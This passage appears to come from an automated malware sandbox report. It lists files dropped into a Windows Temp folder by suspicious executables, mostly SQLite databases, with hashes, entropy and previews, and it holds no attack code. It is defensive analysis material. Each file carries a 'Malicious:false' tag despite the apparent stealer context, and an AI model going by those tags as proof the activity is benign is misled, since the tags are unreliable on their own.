                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                        MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                        SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                        SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                        SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\amMSKXQKGE

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\b9WbqHIwBX

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe
                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):25
                                                                                                                                                                        Entropy (8bit):4.163856189774724
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:JXAiY+In:JXAiY+I
                                                                                                                                                                        MD5:5200F8FDF5D493F83438B69F1259E6B7
                                                                                                                                                                        SHA1:CBB0F228535B2C6C4D412748E672B57553A24CDA
                                                                                                                                                                        SHA-256:F356E4F6116A177F6A22168C566E5DE587AC3D51778AAB603E1710747D7E0BF9
                                                                                                                                                                        SHA-512:8DF044793827DB99959FC6D8FBC4B5ED1B3FAB7DAB04E71929DFA3E20EC54318788464386D2C1EFCFFD034747423180BB5B6AED894282D9B2CB80BBD57FCEB79
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:Nc3VRR2SBMVwvahDS0iBiQbcz

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\bbjqGH81eN

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):126976
                                                                                                                                                                        Entropy (8bit):0.47147045728725767
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                        MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                        SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                        SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                        SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\boXj29ns54

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):159744
                                                                                                                                                                        Entropy (8bit):0.7873599747470391
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                        MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                        SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                        SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                        SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\borYX7RWaE

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\bozLPABZLx

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                        Entropy (8bit):0.5712781801655107
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                        MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                                                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                                                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                                                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\bwUasPXvhk

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                        Entropy (8bit):0.5707520969659783
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                                                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                                                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                                                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\c6MEUzBczD

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):114688
                                                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\cOU5WhySdh

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\chmqyuQx0l

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):114688
                                                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\cnDaRUxtsG

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\cvPJnW6ZRG

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\d7oTWg05ic

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):28672
                                                                                                                                                                        Entropy (8bit):2.5793180405395284
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\e1u6Qj0sWk

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):114688
                                                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\eA6fadxCmr

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\eDLWTWxG8w

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                        Entropy (8bit):0.5712781801655107
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                        MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                                                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                                                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                                                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\eUTgdj6irD

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):114688
                                                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\eoztfc93D9

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):114688
                                                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\esdk4zhMi5

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\eslOqqhGg6

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):114688
                                                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\fDVZda3fuM

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                        Category:dropped
